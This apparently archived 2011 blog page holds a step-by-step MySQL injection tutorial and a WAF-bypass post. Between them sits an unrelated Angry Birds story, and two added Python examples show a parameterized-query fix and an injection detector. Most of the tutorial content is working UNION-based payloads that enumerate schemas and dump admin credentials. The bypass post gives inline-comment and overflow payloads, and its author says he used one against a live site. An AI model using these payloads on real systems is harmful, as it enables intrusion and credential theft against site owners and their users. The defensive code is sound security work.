Sunday, September 25, 2011

MySQL Injection

MYSQL injection

Check for vulnerability:
------------------------
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now, to test if it is vulnerable, we add a ' (quote) to the end of the URL,
so that it becomes http://www.site.com/news.php?id=5'
If we get an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar,
that means it is vulnerable to SQL injection :)
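As an added example (not code from the original post), here is the server-side pattern that makes the quote probe produce that error, placed beside its hardened form. Python's built-in sqlite3 stands in for MySQL so the example runs offline; the `news` table, its rows and the function names are constructed for this illustration. The same string-concatenation defect in `news.php` is what the probe detects, and the fix is the same on MySQL: validate the type of the `id` parameter and bind it as a query parameter instead of pasting it into the SQL text.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the site's MySQL "news" table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "first post"), (5, "fifth post")])
    return db


def vulnerable_lookup(db, id_param):
    # The 'before' pattern: the raw ?id= value is pasted into the query text.
    # A trailing quote breaks the syntax, which is exactly the error the probe looks for.
    return db.execute(f"SELECT title FROM news WHERE id={id_param}").fetchone()


def safe_lookup(db, id_param):
    # Hardened form: reject anything that is not an integer id, then bind the
    # value as a parameter so the database never parses it as SQL.
    try:
        news_id = int(id_param)
    except ValueError:
        return None  # "5'" or "5 order by 4" are not ids; treat as "no such row"
    return db.execute("SELECT title FROM news WHERE id=?", (news_id,)).fetchone()


def probe_reveals_error(db, id_param):
    """True when the concatenated query raises a database error for this input,
    i.e. the condition the post's quote test is looking for."""
    try:
        vulnerable_lookup(db, id_param)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    for value in ("5", "5'"):
        print(repr(value), "vulnerable raises:", probe_reveals_error(db, value),
              "| safe returns:", safe_lookup(db, value))
```

The vulnerable function raises an error for `5'` (the MySQL equivalent is the "You have an error in your SQL syntax" message quoted above), while the hardened function returns no row and leaks nothing about the query structure. Checking the `id` parameter's type before it reaches the database is what stops the `order by` and `union` variants in the following sections from ever being executed.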
Find the number of columns:
----------------------------
To find the number of columns we use the ORDER BY statement (it tells the database how to order the result).
So how do we use it? We just increment the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something like that)
That means it has 3 columns, because we got an error on 4.
Check for UNION function:
-------------------------
With UNION we can select more data in one SQL statement.
So we have
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try --
It's a comment and it's important for our query to work properly.
(We already found in section 2 that the number of columns is 3.)
If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works :)
Check for MySQL version:
------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,4/*
Let's say that we have the number 4 on the screen. Now, to check the version,
we replace the number 4 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
The version should be greater than 5; if it is less than 5 you have to guess the table name.
Getting table and column names:
-------------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
We get the table names. Check for a table named admin or one that holds the login users.
Now to check the column names.
To check the columns, replace the word "table" with "column":
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_value
Note: the table name should be given as a hex value (this works most of the time).
We get the columns displayed on screen: userid, passwd etc...
Now, to retrieve the values, use:
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a: it is the hex value for : (colon). char(58) produces the same colon character, so this works as well:
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash.
When you have this, you can log in as admin or some superuser :D

Thursday, September 15, 2011

Angry Birds Costing Businesses $1.5 Billion In Lost Wages

The world's love of Angry Birds could be costing businesses over $1.5 billion in lost wages, according to an estimate from Alexis Madrigal of the Atlantic.

Madrigal looked at the methodology used to calculate things like how much money companies lose when productivity slows thanks to the NCAA tournament, or how much money is lost thanks to our obsession with fantasy football.

From there he came up with his estimate, which is laid out in the graphic below. He admits the math could be a little fuzzy, but says, "I bet this estimate is right to the order of magnitude, if not in the details."

Frankly, we think these sorts of things are bogus. Productivity isn't lost. People just do what they do. But, it's sort of fun to play with numbers.




Monday, September 12, 2011

MySQL injection with Bypassing WAF:


Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of web application firewalls and to kill certain SQL statements, so that the attacker's commands execute while the actual legitimate query is commented out. Some comments in SQL:
//, --, /**/, #, --+, -- -, ;

Case Changing:

Some WAFs filter keywords with a pattern like /union\select/ig. We can bypass this filter by using inline comments most of the time; more complex examples will require a more advanced approach, like adding SQL keywords that further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point in /*!code*/: MySQL executes the contents of such a comment, so the keyword inside it is still part of our SQL statement.
Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can add more inline comments. For example:

id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()-- -

This bypass above works. I myself just used this against a Web site recently.
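From the defender's side, the comment and case-changing tricks above (and the plain `order by` / `union all select` probes in the earlier MySQL injection post) all defeat the same thing: a keyword match applied to the raw request text. The added example below, which is not code from the original posts, shows why the `/union\select/ig`-style filter misses `/*!UnIoN*/SeLeCT` and how a detector that first normalizes the parameter the way MySQL will parse it (decoding `+` as a space, keeping the body of executable `/*! */` comments, dropping ordinary comments) catches both the obfuscated and the plain forms. The sample payloads are the ones quoted on this page; the signature names, the `naive_filter_hits` reading of the quoted filter and the normalization order are assumptions made for this illustration.

```python
import re


def normalize_sql_param(value: str) -> str:
    """Rewrite a request parameter into the text MySQL would actually parse."""
    s = value.replace("+", " ")                # '+' is the URL encoding of a space
    s = re.sub(r"/\*!(.*?)\*/", r" \1 ", s)    # /*!UnIoN*/ -> keyword is kept (MySQL executes it)
    s = re.sub(r"/\*.*?\*/", " ", s)           # ordinary block comments are dropped
    s = re.sub(r"/\*.*", " ", s)               # an unterminated trailing /* is dropped too
    s = re.sub(r"(--|#).*", " ", s)            # -- and # line comments
    return re.sub(r"\s+", " ", s).strip().lower()


# Signatures for the probes described on this page, matched against the
# normalized text. Names are constructed for this example.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "schema_read": re.compile(r"\binformation_schema\b"),
    "version_read": re.compile(r"@@version|\bversion\s*\("),
}


def classify(value: str):
    """Return the names of the signatures that fire for this parameter value."""
    norm = normalize_sql_param(value)
    return [name for name, pat in SIGNATURES.items() if pat.search(norm)]


def naive_filter_hits(value: str) -> bool:
    # Assumed reading of the post's /union\select/ig filter: case-insensitive,
    # but run over the raw text with no normalization.
    return re.search(r"union\s+select", value, re.IGNORECASE) is not None


# Constructed samples: the plain probes from the first post and the two
# obfuscated payloads from this one.
SAMPLES = [
    "5",
    "5 order by 4/*",
    "5 union all select 1,2,3/*",
    "5 union all select 1,2,3,@@version/*",
    "1/*!UnIoN*/SeLeCT",
    "1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM /*information_schema*/.tables "
    "/*!WHERE */+/*!TaBlE_ScHeMa*/=database()-- -",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r}\n  naive filter: {naive_filter_hits(sample)}"
              f"  normalized signatures: {classify(sample)}")
```

The two obfuscated payloads are not flagged by the naive filter (the keywords are separated by `*/`, `+` or mixed case, not by a space) but both reduce to `union select` after normalization. Note that the plain `/*information_schema*/` comment disappears in the normalized form, exactly as it does for MySQL, so a detector has to look at the parsed query shape rather than hunt for individual suspicious words.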

Buffer Overflow / Unexpected input:
A lot of WAFs are written in the C language, making them prone to overflows or to behaving differently when loaded with a bunch of data. Here is a WAF that does its job correctly, but when given a large amount of data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+
